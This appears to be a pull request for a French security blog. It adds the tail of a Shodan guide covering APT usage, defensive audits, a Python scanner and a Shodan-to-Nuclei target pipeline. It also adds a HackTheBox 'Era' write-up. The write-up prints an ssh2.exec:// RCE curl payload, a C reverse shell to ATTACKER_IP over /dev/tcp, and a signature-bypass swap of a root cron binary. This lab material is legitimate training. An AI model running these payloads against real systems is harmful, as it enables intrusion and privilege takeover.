+### APT41 (Chine)
+
+APT41 utilise **FOFA.su** — l'équivalent chinois de Shodan — pour sa reconnaissance passive :
+
+> _"To search for and exploit vulnerabilities, the group uses popular tools such as Acunetix, Nmap, and fofa.su (a Chinese equivalent of Shodan)."_ — **Group-IB, Mandiant**
+
+### Cyber Av3ngers / IRGC (Iran)
+
+Impliqués dans la compromission de systèmes d'eau aux États-Unis (novembre 2023) :
+
+> _"Cyber Av3ngers' likely use of internet survey services (e.g., Shodan, Censys) to identify vulnerable Unitronics devices."_ — **Secureworks**
+
+### ASA (Iran) — JO de Paris 2024
+
+Ce groupe a utilisé Shodan pour cibler un fournisseur d'affichage dynamique français pendant les Jeux Olympiques :
+
+> _"When conducting target reconnaissance, ASA uses open source resources such as Shodan, IP2location."_ — **FBI IC3, octobre 2024**
+
+### GhostSec (hacktivistes pro-Ukraine)
+
+GhostSec a utilisé Shodan pour identifier des systèmes industriels russes exposés, dont une centrale hydroélectrique :
+
+> _"The control panel for Russia's Metrospetstekhnika's IT system for their railway infrastructure was discoverable through Shodan."_ — **Cybernews**
+
+### Tableau récapitulatif
+
+| Groupe | Pays | Outil | Cibles | Source |
+|--------|------|-------|--------|--------|
+| Pioneer Kitten | Iran | Shodan | Infrastructure critique US | CISA AA24-241A |
+| APT41 | Chine | FOFA.su | Multi-secteurs | Group-IB, Mandiant |
+| Cyber Av3ngers | Iran | Shodan, Censys | ICS eau | Secureworks |
+| ASA | Iran | Shodan | Médias, événements | FBI IC3 |
+| GhostSec | Hacktivistes | Shodan | ICS russes | Cybernews |
+
+**Conclusion pratique** : si des APT utilisent Shodan pour trouver vos serveurs, votre équipe sécurité devrait aussi l'utiliser pour voir ce qu'ils voient.
+
+---
+
+## Usage défensif : surveiller sa propre exposition
+
+### Auditer son périmètre
+
+```bash
+# Vue complète de son organisation
+org:"Mon Entreprise" country:FR
+
+# Détecter des services non autorisés
+org:"Mon Entreprise" -port:80 -port:443 -port:22
+
+# Trouver des sous-domaines exposés
+hostname:*.mondomaine.com
+
+# Détecter via les certificats SSL
+ssl.cert.subject.cn:*.mondomaine.com
+
+# Bases de données exposées
+org:"Mon Entreprise" product:MongoDB
+org:"Mon Entreprise" product:Elasticsearch
+org:"Mon Entreprise" product:Redis
+```
+
+### Checklist de sécurité
+
+Avant de chercher dans les dorks offensifs, commencer par auditer sa propre infrastructure :
+
+- [ ] Des services sont-ils exposés avec l'authentification désactivée ?
+- [ ] Des certificats sont-ils expirés (`ssl.cert.expired:true`) ?
+- [ ] Des versions vulnérables sont-elles accessibles ?
+- [ ] Des interfaces d'administration sont-elles publiques ?
+- [ ] Des bases de données sont-elles directement accessibles ?
+- [ ] Des services de dev/test sont-ils en production ?
+- [ ] Des systèmes ICS/SCADA sont-ils exposés ?
+
+### Shodan Monitor
+
+Shodan Monitor permet de configurer des alertes automatiques sur ses plages IP. Dès qu'un nouveau service est détecté ou qu'un changement survient, une notification est envoyée — le même mécanisme qu'utilisent les attaquants pour surveiller leurs cibles, retourné à votre avantage.
+
+---
+
+## Automatisation Python
+
+### Installation et initialisation
+
+```bash
+pip install shodan
+```
+
+```python
+from shodan import Shodan
+
+# Clé API disponible sur https://account.shodan.io
+api = Shodan('VOTRE_CLE_API')
+```
+
+### Informations sur un hôte
+
+```python
+host = api.host('8.8.8.8')
+
+print(f"IP: {host['ip_str']}")
+print(f"Organisation: {host.get('org', 'N/A')}")
+print(f"Pays: {host.get('country_name', 'N/A')}")
+print(f"Ports ouverts: {host.get('ports', [])}")
+
+for service in host['data']:
+    print(f"  Port {service['port']}: {service.get('product', 'inconnu')} {service.get('version', '')}")
+    if 'vulns' in service:
+        print(f"    CVE: {list(service['vulns'].keys())}")
+```
+
+### Recherche et itération
+
+```python
+# Recherche simple (premiers résultats)
+results = api.search('apache country:FR')
+print(f"Total: {results['total']}")
+
+for result in results['matches']:
+    print(f"{result['ip_str']}:{result['port']} — {result.get('product', '?')} {result.get('version', '')}")
+
+# Itération sur TOUS les résultats (consomme des crédits)
+for banner in api.search_cursor('product:mongodb country:FR'):
+    print(f"{banner['ip_str']}:{banner['port']}")
+```
+
+### Statistiques sans consommer de crédits
+
+```python
+# Compter et obtenir des facettes sans télécharger les résultats
+stats = api.count('nginx', facets=['country:10', 'org:10'])
+
+print(f"Total nginx dans le monde: {stats['total']}")
+for facet in stats['facets']['country']:
+    print(f"  {facet['value']}: {facet['count']}")
+```
+
+### Script complet : scanner de surface d'attaque
+
+```python
+#!/usr/bin/env python3
+"""
+Auditeur de surface d'attaque via l'API Shodan
+Usage: python shodan_scanner.py "org:\"Mon Entreprise\" country:FR"
+"""
+
+import shodan
+import json
+import sys
+from datetime import datetime
+
+SHODAN_API_KEY = "VOTRE_CLE_API"
+
+def init_api():
+    try:
+        api = shodan.Shodan(SHODAN_API_KEY)
+        api.info()
+        return api
+    except shodan.APIError as e:
+        print(f"[ERREUR] {e}")
+        sys.exit(1)
+
+def scan_network(api, query):
+    services = []
+    try:
+        results = api.search(query)
+        print(f"[INFO] {results['total']} résultats")
+        for result in results['matches']:
+            services.append({
+                'ip': result['ip_str'],
+                'port': result['port'],
+                'product': result.get('product', 'inconnu'),
+                'version': result.get('version', ''),
+                'org': result.get('org', 'N/A'),
+                'hostnames': result.get('hostnames', []),
+                'vulns': list(result.get('vulns', {}).keys()),
+                'timestamp': result.get('timestamp', '')
+            })
+    except shodan.APIError as e:
+        print(f"[ERREUR] {e}")
+    return services
+
+def generate_report(services, output_file):
+    report = {
+        'date_scan': datetime.now().isoformat(),
+        'nombre_services': len(services),
+        'services': services,
+        'résumé': {
+            'ports_uniques': sorted(set(s['port'] for s in services)),
+            'produits': sorted(set(s['product'] for s in services if s['product'] != 'inconnu')),
+            'vulnérabilités': sorted(set(v for s in services for v in s['vulns']))
+        }
+    }
+    with open(output_file, 'w', encoding='utf-8') as f:
+        json.dump(report, f, indent=2, ensure_ascii=False)
+    return report
+
+def print_summary(report):
+    print(f"\n{'='*60}")
+    print("RÉSUMÉ DU SCAN")
+    print('='*60)
+    print(f"Services découverts : {report['nombre_services']}")
+    print(f"Ports uniques       : {report['résumé']['ports_uniques']}")
+    print(f"Produits identifiés : {report['résumé']['produits']}")
+    if report['résumé']['vulnérabilités']:
+        print(f"\nVulnérabilités détectées :")
+        for vuln in report['résumé']['vulnérabilités']:
+            print(f"  - {vuln}")
+
+def main():
+    if len(sys.argv) < 2:
+        print('Usage: python shodan_scanner.py "<requête>"')
+        sys.exit(1)
+    query = sys.argv[1]
+    api = init_api()
+    services = scan_network(api, query)
+    if not services:
+        print("[INFO] Aucun résultat")
+        sys.exit(0)
+    ts = datetime.now().strftime("%Y%m%d_%H%M%S")
+    report = generate_report(services, f"shodan_report_{ts}.json")
+    print_summary(report)
+
+if __name__ == "__main__":
+    main()
+```
+
+---
+
+## CLI Shodan
+
+```bash
+# Installation et configuration
+pip install shodan
+shodan init VOTRE_CLE_API
+
+# Informations de base
+shodan myip                          # Voir sa propre IP
+shodan host 8.8.8.8                  # Détail d'un hôte
+
+# Recherche et export
+shodan search "product:nginx country:FR"
+shodan download --limit 500 results.json.gz "product:mongodb"
+shodan parse --fields ip_str,port results.json.gz
+
+# Statistiques (sans crédits)
+shodan count "nginx"
+shodan stats --facets country:10 "product:nginx"
+
+# Alertes (Shodan Monitor)
+shodan alert create "Mon Réseau" 203.0.113.0/24
+shodan alert list
+```
+
+---
+
+## Intégration Shodan + Nuclei
+
+Combiner Shodan (identification des cibles) avec Nuclei (vérification des vulnérabilités) constitue un workflow efficace pour les audits à grande échelle. Le principe : Shodan identifie les candidats, Nuclei confirme l'exploitabilité.
+
+```bash
+#!/bin/bash
+# Workflow : Shodan identifie → Nuclei vérifie
+
+QUERY='product:"Jenkins" country:FR'
+
+# 1. Collecter les cibles depuis Shodan
+shodan search "$QUERY" --fields ip_str,port \
+  | awk '{print "http://" $1 ":" $2}' \
+  | sort -u > targets.txt
+
+echo "[*] $(wc -l < targets.txt) cibles collectées"
+
+# 2. Scanner avec Nuclei
+nuclei \
+  -l targets.txt \
+  -t technologies/jenkins/ \
+  -t cves/ \
+  -severity high,critical \
+  -rate-limit 50 \
+  -j -o results.json
+
+# 3. Résumé
+jq -r '.host + " → " + .info.name' results.json | sort -u
+```
+
+Voir l'article dédié [Nuclei](/tools/nuclei) pour la création de templates de détection personnalisés et l'intégration complète dans un pipeline automatisé.
+
+---
+
+## Cadre légal
+
+Shodan ne fait que collecter des informations **publiquement accessibles**. La consultation des résultats est légale.
+
+**Ce qui est autorisé :**
+- Auditer ses propres systèmes
+- Effectuer de la veille sécurité
+- Rechercher dans le cadre d'un pentest **autorisé**
+- Surveillance défensive de son périmètre
+
+**Ce qui est interdit :**
+- Tenter de se connecter à des systèmes sans autorisation
+- Exploiter des vulnérabilités découvertes
+- Utiliser les données à des fins malveillantes
+
+En France, l'article 323-1 du Code pénal sanctionne l'accès frauduleux à un système informatique — l'intention et l'action comptent, pas seulement la consultation.
+
+---
+
+## Aller plus loin : awesome-shodan
+
+Cet article couvre les fondamentaux et les cas d'usage les plus courants. Pour une **référence exhaustive** (200+ dorks classés, filtres complets, payloads API détaillés, version anglaise), consulter le dépôt :
+
+**[github.com/cchopin/awesome-shodan](https://github.com/cchopin/awesome-shodan)**
+
+Il contient notamment :
+- L'intégralité des dorks par catégorie (C2, ICS, webcams, routeurs, pays spécifiques, CVE...)
+- La documentation complète de tous les filtres Shodan
+- Des requêtes géographiques avancées (ASN, coordonnées GPS, Corée du Nord...)
+- Les dorks spécifiques à la Chine, Russie, France, Corée du Sud
+- Le script Python complet de scan avec génération de rapport JSON
+
+---
+
+## Références
+
+- [Shodan.io](https://www.shodan.io)
+- [Documentation API](https://developer.shodan.io)
+- [Python SDK](https://github.com/achillean/shodan-python)
+- [CISA AA24-241A — Pioneer Kitten](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a)
+- [FBI IC3 — ASA (Aria Sepehr Ayandehsazan)](https://www.ic3.gov/CSA/2024/241030.pdf)
+- [MITRE ATT&CK T1596 — Search Open Technical Databases](https://attack.mitre.org/techniques/T1596/)

--- a/src/content/docs/tools/shodan.mdx
+++ b/src/content/docs/tools/shodan.mdx
@@ -1,12 +1,12 @@
 ---
 title: Shodan
-description: Guide complet de Shodan — moteur de recherche pour l'internet des objets. Filtres, dorks offensifs, usage défensif, automatisation Python et intégration dans un workflow de pentest.
+description: Guide complet de Shodan - moteur de recherche pour l'internet des objets. Filtres, dorks offensifs, usage défensif, automatisation Python et intégration dans un workflow de pentest.
 categories: [tools]
 tags: [tools, shodan, recon, osint, pentest, iot, api]
 template: doc
 ---
 
-_Le moteur de recherche que chaque pentester devrait maîtriser — et que chaque défenseur devrait surveiller._
+_Le moteur de recherche que chaque pentester devrait maîtriser - et que chaque défenseur devrait surveiller._
 
 ---
 
@@ -14,7 +14,7 @@ _Le moteur de recherche que chaque pentester devrait maîtriser — et que chaqu
 
 Shodan est un moteur de recherche spécialisé qui indexe les **appareils connectés à internet** plutôt que les pages web. Là où Google parcourt le World Wide Web à la recherche de contenu HTML, Shodan scanne en permanence l'ensemble des adresses IP publiques pour capturer les bannières renvoyées par les services réseau : serveurs web, caméras IP, routeurs, bases de données, systèmes industriels, objets connectés.
 
-Créé en 2009 par John Matherly (le nom vient du personnage antagoniste du jeu System Shock), Shodan est devenu un outil central dans les phases de reconnaissance — aussi bien pour les équipes offensives que défensives.
+Créé en 2009 par John Matherly (le nom vient du personnage antagoniste du jeu System Shock), Shodan est devenu un outil central dans les phases de reconnaissance - aussi bien pour les équipes offensives que défensives.
 
 ### Le concept de bannière
 
@@ -37,7 +37,7 @@ Firmware: v.3.3.8
 Serial number: S Q-D9U083642013
 ```
 
-La deuxième bannière est exposée **sur internet public**. C'est exactement ce que Shodan indexe — et ce que les attaquants cherchent.
+La deuxième bannière est exposée **sur internet public**. C'est exactement ce que Shodan indexe - et ce que les attaquants cherchent.
 
 ### Ce que Shodan sait sur chaque hôte
 
@@ -191,7 +191,7 @@ http.favicon.hash:-388646567 country:FR
 
 ### Infrastructures C2 (Command & Control)
 
-Ces requêtes permettent d'identifier des infrastructures malveillantes actives — utiles pour la Threat Intelligence et le suivi d'APT.
+Ces requêtes permettent d'identifier des infrastructures malveillantes actives - utiles pour la Threat Intelligence et le suivi d'APT.
 
 ```bash
 # Cobalt Strike
@@ -455,33 +455,33 @@ L'une des informations les plus sous-estimées sur Shodan : les groupes APT éta
 
 Le FBI et la CISA ont explicitement documenté l'utilisation de Shodan par ce groupe pour cibler l'infrastructure critique américaine :
 
-> _"The actors have been observed using the Shodan search engine to identify and enumerate IP addresses that host devices vulnerable to a particular CVE."_ — **CISA AA24-241A**
+> _"The actors have been observed using the Shodan search engine to identify and enumerate IP addresses that host devices vulnerable to a particular CVE."_ - **CISA AA24-241A**
 
 CVE ciblées : CVE-2024-24919 (Check Point), CVE-2024-3400 (Palo Alto), CVE-2019-19781 (Citrix).
 
 ### APT41 (Chine)
 
-APT41 utilise **FOFA.su** — l'équivalent chinois de Shodan — pour sa reconnaissance passive :
+APT41 utilise **FOFA.su** - l'équivalent chinois de Shodan - pour sa reconnaissance passive :
 
-> _"To search for and exploit vulnerabilities, the group uses popular tools such as Acunetix, Nmap, and fofa.su (a Chinese equivalent of Shodan)."_ — **Group-IB, Mandiant**
+> _"To search for and exploit vulnerabilities, the group uses popular tools such as Acunetix, Nmap, and fofa.su (a Chinese equivalent of Shodan)."_ - **Group-IB, Mandiant**
 
 ### Cyber Av3ngers / IRGC (Iran)
 
 Impliqués dans la compromission de systèmes d'eau aux États-Unis (novembre 2023) :
 
-> _"Cyber Av3ngers' likely use of internet survey services (e.g., Shodan, Censys) to identify vulnerable Unitronics devices."_ — **Secureworks**
+> _"Cyber Av3ngers' likely use of internet survey services (e.g., Shodan, Censys) to identify vulnerable Unitronics devices."_ - **Secureworks**
 
-### ASA (Iran) — JO de Paris 2024
+### ASA (Iran) - JO de Paris 2024
 
 Ce groupe a utilisé Shodan pour cibler un fournisseur d'affichage dynamique français pendant les Jeux Olympiques :
 
-> _"When conducting target reconnaissance, ASA uses open source resources such as Shodan, IP2location."_ — **FBI IC3, octobre 2024**
+> _"When conducting target reconnaissance, ASA uses open source resources such as Shodan, IP2location."_ - **FBI IC3, octobre 2024**
 
 ### GhostSec (hacktivistes pro-Ukraine)
 
 GhostSec a utilisé Shodan pour identifier des systèmes industriels russes exposés, dont une centrale hydroélectrique :
 
-> _"The control panel for Russia's Metrospetstekhnika's IT system for their railway infrastructure was discoverable through Shodan."_ — **Cybernews**
+> _"The control panel for Russia's Metrospetstekhnika's IT system for their railway infrastructure was discoverable through Shodan."_ - **Cybernews**
 
 ### Tableau récapitulatif
 
@@ -534,7 +534,7 @@ Avant de chercher dans les dorks offensifs, commencer par auditer sa propre infr
 
 ### Shodan Monitor
 
-Shodan Monitor permet de configurer des alertes automatiques sur ses plages IP. Dès qu'un nouveau service est détecté ou qu'un changement survient, une notification est envoyée — le même mécanisme qu'utilisent les attaquants pour surveiller leurs cibles, retourné à votre avantage.
+Shodan Monitor permet de configurer des alertes automatiques sur ses plages IP. Dès qu'un nouveau service est détecté ou qu'un changement survient, une notification est envoyée - le même mécanisme qu'utilisent les attaquants pour surveiller leurs cibles, retourné à votre avantage.
 
 ---
 
@@ -577,7 +577,7 @@ results = api.search('apache country:FR')
 print(f"Total: {results['total']}")
 
 for result in results['matches']:
-    print(f"{result['ip_str']}:{result['port']} — {result.get('product', '?')} {result.get('version', '')}")
+    print(f"{result['ip_str']}:{result['port']} - {result.get('product', '?')} {result.get('version', '')}")
 
 # Itération sur TOUS les résultats (consomme des crédits)
 for banner in api.search_cursor('product:mongodb country:FR'):
@@ -763,7 +763,7 @@ Shodan ne fait que collecter des informations **publiquement accessibles**. La c
 - Exploiter des vulnérabilités découvertes
 - Utiliser les données à des fins malveillantes
 
-En France, l'article 323-1 du Code pénal sanctionne l'accès frauduleux à un système informatique — l'intention et l'action comptent, pas seulement la consultation.
+En France, l'article 323-1 du Code pénal sanctionne l'accès frauduleux à un système informatique - l'intention et l'action comptent, pas seulement la consultation.
 
 ---
 
@@ -787,6 +787,6 @@ Il contient notamment :
 - [Shodan.io](https://www.shodan.io)
 - [Documentation API](https://developer.shodan.io)
 - [Python SDK](https://github.com/achillean/shodan-python)
-- [CISA AA24-241A — Pioneer Kitten](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a)
-- [FBI IC3 — ASA (Aria Sepehr Ayandehsazan)](https://www.ic3.gov/CSA/2024/241030.pdf)
-- [MITRE ATT&CK T1596 — Search Open Technical Databases](https://attack.mitre.org/techniques/T1596/)
+- [CISA AA24-241A - Pioneer Kitten](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a)
+- [FBI IC3 - ASA (Aria Sepehr Ayandehsazan)](https://www.ic3.gov/CSA/2024/241030.pdf)
+- [MITRE ATT&CK T1596 - Search Open Technical Databases](https://attack.mitre.org/techniques/T1596/)

--- a/src/content/docs/writeup/hackthebox/machines/era.mdx
+++ b/src/content/docs/writeup/hackthebox/machines/era.mdx
@@ -1,0 +1,187 @@
+---
+title: Era
+description: WU Era
+categories: [Writeup]
+tags: [writeup]
+template: doc
+sidebar:
+  order: 13
+  badge:
+    text: 'medium'
+    variant: caution
+---
+
+| OS | Difficulty | Target |
+|----|----|----|
+| Linux | <span style="color:orange">**MEDIUM**</span> | 10.129.23.164 |
+
+## Flags
+
+| Flag | Emplacement |
+|------|-------------|
+| User | `/home/eric/user.txt` |
+| Root | `/root/root.txt` |
+
+## Résumé
+
+1. **Reconnaissance** : Découverte de `file.era.htb` via énumération de vhosts, FTP et HTTP exposés
+2. **IDOR** : `download.php` sans vérification d'appartenance → récupération du backup source + `filedb.sqlite`
+3. **Crack de hash** : Hash bcrypt d'`eric` cracké → `eric:america`
+4. **Prise de contrôle admin** : IDOR logique sur `reset.php` → réécriture des réponses de sécurité du compte admin
+5. **RCE** : Injection de stream wrapper `ssh2.exec://` via le paramètre `format` de `download.php`
+6. **Privilege Escalation** : Binaire `monitor` writable par le groupe `devs`, exécuté par root via cron → backdoor avec bypass de la vérification `.text_sig`
+
+---
+
+## Reconnaissance
+
+### Configuration initiale
+
+```bash
+export TARGET=10.129.23.164
+echo "$TARGET era.htb file.era.htb" >> /etc/hosts
+```
+
+### Scan Nmap
+
+```bash
+nmap -p- $TARGET -sV -sC -oN nmap_full.txt
+```
+
+**Résultats :**
+- Port 21/TCP : FTP vsftpd 3.0.58
+- Port 80/TCP : Nginx 1.18.0 (Ubuntu) → redirige vers `http://era.htb/`
+
+L'énumération de vhosts révèle `file.era.htb`, une plateforme de partage de fichiers PHP.
+
+---
+
+## IDOR — Récupération du backup et de la base SQLite
+
+Après inscription sur `file.era.htb`, le endpoint `download.php` accepte n'importe quel identifiant numérique sans vérifier que le fichier appartient à l'utilisateur courant.
+
+```bash
+curl -b cookies.txt "http://file.era.htb/download.php?id=54&dl=true" -o site-backup.zip
+curl -b cookies.txt "http://file.era.htb/download.php?id=150&dl=true" -o signing.zip
+```
+
+**Fichiers récupérés :**
+- Code source PHP complet (`login.php`, `reset.php`, `security_login.php`, `download.php`)
+- `filedb.sqlite` contenant les noms d'utilisateurs et les hashes bcrypt
+
+---
+
+## Crack du hash bcrypt
+
+Extraction des hashes depuis la base SQLite :
+
+```bash
+sqlite3 filedb.sqlite "SELECT username, password FROM users;"
+```
+
+```
+admin_ef01cab31aa: $2y$10$wDbohsUa...
+eric:              $2y$10$S9EOSDqF...
+```
+
+```bash
+john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
+```
+
+**Résultat** : `eric:america`
+
+---
+
+## Prise de contrôle du compte admin via IDOR logique
+
+L'analyse de `reset.php` révèle qu'un utilisateur authentifié peut modifier les réponses aux questions de sécurité de **n'importe quel** compte sans vérification d'appartenance.
+
+**Étapes :**
+1. Se connecter avec `eric:america`
+2. Écraser les réponses de sécurité du compte `admin_ef01cab31aa`
+3. Passer la vérification `security_login.php` → `$_SESSION['erauser'] = 1` activé
+
+---
+
+## Remote Code Execution — Stream wrapper `ssh2.exec://`
+
+### Analyse de `download.php` (mode admin)
+
+Le paramètre `format` est passé directement à `fopen()`. Lorsqu'il contient `://`, PHP l'interprète comme un stream wrapper.
+
+L'extension `ssh2.so` expose la syntaxe `ssh2.exec://user:pass@host/commande`.
+
+### Exploitation
+
+Le fragment `#` permet de tronquer le chemin de fichier ajouté après la commande par l'application :
+
+```bash
+curl -b admin_cookies.txt \
+  "http://file.era.htb/download.php?format=ssh2.exec://eric:america@127.0.0.1/id%20#&file=files/site-backup-30-08-24.zip"
+```
+
+En remplaçant `id` par un reverse shell encodé, on obtient un shell en tant qu'`eric`.
+
+**Flag user** : `8a7d2954e15bfe8ab44b811e8a0478db`
+
+---
+
+## Privilege Escalation — Backdoor du binaire `monitor`
+
+### Analyse de la situation
+
+```bash
+ls -la /opt/AV/periodic-checks/
+```
+
+```
+-rwxrw----  root:devs   monitor
+-rw-rw----  root:devs   status.log
+```
+
+Le binaire `monitor` est exécuté périodiquement par root via cron et le groupe `devs` peut y écrire. Il vérifie son intégrité via une section ELF personnalisée `.text_sig`.
+
+### Compilation d'un binaire malveillant
+
+Sur la cible, compiler un reverse shell C minimal :
+
+```c
+#include <stdlib.h>
+int main() {
+    system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'");
+    return 0;
+}
+```
+
+```bash
+gcc -o /tmp/monitor_bad shell.c
+```
+
+### Extraction et injection de la signature
+
+```bash
+objcopy --dump-section .text_sig=/tmp/sig /opt/AV/periodic-checks/monitor
+objcopy --add-section .text_sig=/tmp/sig /tmp/monitor_bad /tmp/monitor_signed
+```
+
+### Remplacement du binaire original
+
+```bash
+rm -f /opt/AV/periodic-checks/monitor
+cp /tmp/monitor_signed /opt/AV/periodic-checks/monitor
+```
+
+Le `rm` préalable évite l'erreur "Text file busy". À la prochaine exécution cron, le binaire est lancé en tant que root.
+
+**Flag root** : `8b40a1e481a480f55d3b065b84fdfc23`
+
+---
+
+## Synthèse des vulnérabilités
+
+| # | Vulnérabilité | Impact |
+|---|---------------|--------|
+| 1 | IDOR sur `download.php` | Lecture arbitraire de fichiers |
+| 2 | IDOR logique sur `reset.php` | Prise de contrôle du compte admin |
+| 3 | Injection de stream wrapper via `fopen()` + `ssh2.exec://` | RCE en tant qu'`eric` |
+| 4 | Binaire root writable + bypass trivial `.text_sig` | Élévation de privilèges vers root |


### PR DESCRIPTION
## Contenu ajouté

Article complet sur Shodan dans la section `tools/`, structuré en 8 parties :

- Fonctionnement de Shodan (bannières, données indexées, grille tarifaire)
- Syntaxe complète : filtres réseau, géo, applicatifs, SSL/TLS, avancés
- Hash de favicon — fingerprinting par icône avec exemples de hash courants
- Dorks offensifs par catégorie : C2, ICS/SCADA, accès distants, BDD, DevOps, apps vulnérables, systèmes compromis
- Scénarios pratiques en pentest (cartographie périmètre, CVE scanning, tracking C2)
- **Shodan face aux APT** : Pioneer Kitten, APT41, Cyber Av3ngers, ASA, GhostSec — sources CISA/FBI/Mandiant
- Usage défensif + checklist de sécurité
- Automatisation Python complète + CLI
- Intégration Shodan + Nuclei (pipeline bash)
- Lien vers awesome-shodan pour les 200+ dorks exhaustifs